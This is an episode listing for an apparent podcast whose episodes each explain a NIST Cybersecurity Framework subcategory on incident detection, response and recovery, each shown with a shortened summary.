All Episodes
Displaying 1 - 30 of 114 in total
RC.CO-04 - Sharing Public Recovery Updates
RC.CO-04 involves sharing public updates on incident recovery using approved channels and messaging, such as breach notifications or preventative steps, to inform affe...
RC.CO-03 - Communicating Recovery Progress
RC.CO-03 ensures recovery activities and progress are shared with designated stakeholders—like leadership and suppliers—consistent with response plans and agreements. ...
RC.RP-06 - Declaring Recovery Completion
RC.RP-06 declares the end of recovery once predefined criteria are met, finalizing the process with a comprehensive after-action report detailing the incident, actions...
RC.RP-05 - Confirming System Restoration
RC.RP-05 verifies the integrity of restored assets—checking for lingering threats or root causes—before returning systems to production, confirming normal operations. ...
RC.RP-04 - Restoring Critical Functions Post-Incident
RC.RP-04 considers critical mission functions and cybersecurity risks to define post-incident operational norms, using impact records to prioritize restoration order. ...
RC.RP-03 - Verifying Backup Integrity
RC.RP-03 ensures backups and restoration assets are checked for integrity—free of compromise or corruption—before use in recovery efforts. This verification prevents r...
RC.RP-02 - Prioritizing Recovery Actions
RC.RP-02 involves selecting, scoping, and prioritizing recovery actions based on incident response plan criteria and available resources, adapting as needs shift. This...
RC.RP-01 - Launching Incident Recovery Efforts
RC.RP-01 initiates the recovery phase of the incident response plan once triggered, ensuring all responsible parties are aware of their roles and required authorizatio...
RS.MI-02 - Eradicating Incident Threats
RS.MI-02 ensures incidents are fully eradicated, removing threats like malware or unauthorized access through automated system features or manual responder actions. Th...
RS.MI-01 - Containing Cybersecurity Incidents
RS.MI-01 focuses on containing incidents to prevent their expansion, using automated tools like antivirus or manual actions by responders to isolate threats. This can ...
RS.CO-03 - Sharing Information with Stakeholders
RS.CO-03 involves sharing incident information with designated stakeholders—both internal, like leadership, and external, like ISACs—consistent with response plans and...
RS.CO-02 - Notifying Stakeholders of Incidents
RS.CO-02 ensures timely notification of internal and external stakeholders—like customers, partners, or regulators—about incidents, following breach procedures or cont...
RS.AN-08 - Assessing Incident Magnitude
RS.AN-08 estimates and validates an incident’s magnitude by assessing its scope and impact, searching other targets for indicators of compromise or persistence. This i...
RS.AN-07 - Preserving Incident Data Integrity
RS.AN-07 focuses on collecting and preserving incident data and metadata—such as source and timestamps—using chain-of-custody procedures to ensure integrity. This comp...
RS.AN-06 - Recording Investigation Actions
RS.AN-06 ensures that all investigative actions during an incident—like system checks or containment steps—are meticulously recorded, with integrity and provenance pre...
RS.AN-03 - Investigating Incident Causes
RS.AN-03 conducts detailed analysis to reconstruct incident events, identify involved assets, and pinpoint root causes, such as exploited vulnerabilities or threat act...
RS.MA-05 - Initiating Incident Recovery
RS.MA-05 applies predefined criteria to determine when to shift from response to recovery, based on incident characteristics and operational considerations. This decis...
RS.MA-04 - Escalating Incidents When Needed
RS.MA-04 ensures incidents are escalated or elevated to higher levels of authority or expertise when their complexity or impact exceeds initial handling capabilities. ...
RS.MA-03 - Categorizing and Prioritizing Incidents
RS.MA-03 categorizes incidents—such as ransomware or data breaches—and prioritizes them based on scope, impact, and urgency, balancing rapid recovery with investigatio...
RS.MA-02 - Triaging and Validating Incident Reports
RS.MA-02 involves triaging and validating incident reports to confirm their cybersecurity relevance and need for response, applying severity criteria to prioritize act...
RS.MA-01 - Executing the Incident Response Plan
RS.MA-01 initiates the execution of the incident response plan in coordination with third parties—like outsourcers or suppliers—once an incident is confirmed. This inc...
DE.AE-08 - Declaring Incidents Based on Criteria
DE.AE-08 involves declaring incidents when adverse events meet predefined criteria, such as severity or scope, ensuring a formal response is triggered. This process ac...
DE.AE-07 - Enhancing Analysis with Threat Intelligence
DE.AE-07 integrates cyber threat intelligence and contextual data—like asset inventories or vulnerability disclosures—into adverse event analysis to enhance accuracy a...
DE.AE-06 - Sharing Adverse Event Information
DE.AE-06 ensures that information about adverse events is promptly shared with authorized staff—such as SOC teams and incident responders—and integrated into response ...
DE.AE-04 - Estimating the Impact of Adverse Events
DE.AE-04 estimates the impact and scope of adverse events to gauge their potential harm, using tools like SIEMs or manual analysis to assess affected assets and severi...
DE.AE-03 - Correlating Data from Multiple Sources
DE.AE-03 correlates information from diverse sources—like logs, sensors, and threat intelligence—to build a unified picture of potential adverse events. This involves ...
DE.AE-02 - Analyzing Adverse Events for Insights
DE.AE-02 focuses on analyzing potentially adverse events to understand their nature, using tools like SIEM systems to examine log events for malicious or suspicious ac...
DE.CM-09 - Detecting Threats Across Technology Stacks
DE.CM-09 involves monitoring hardware, software, runtime environments, and associated data to detect adverse events like malware, phishing, or tampering. This includes...
DE.CM-06 - Monitoring External Service Providers
DE.CM-06 requires monitoring the activities and services of external providers—like cloud platforms or ISPs—to detect adverse events that could impact the organization...
DE.CM-03 - Tracking Personnel and Technology Usage
DE.CM-03 monitors personnel activity and technology usage to identify potentially adverse events, such as insider threats or policy violations, using tools like behavi...
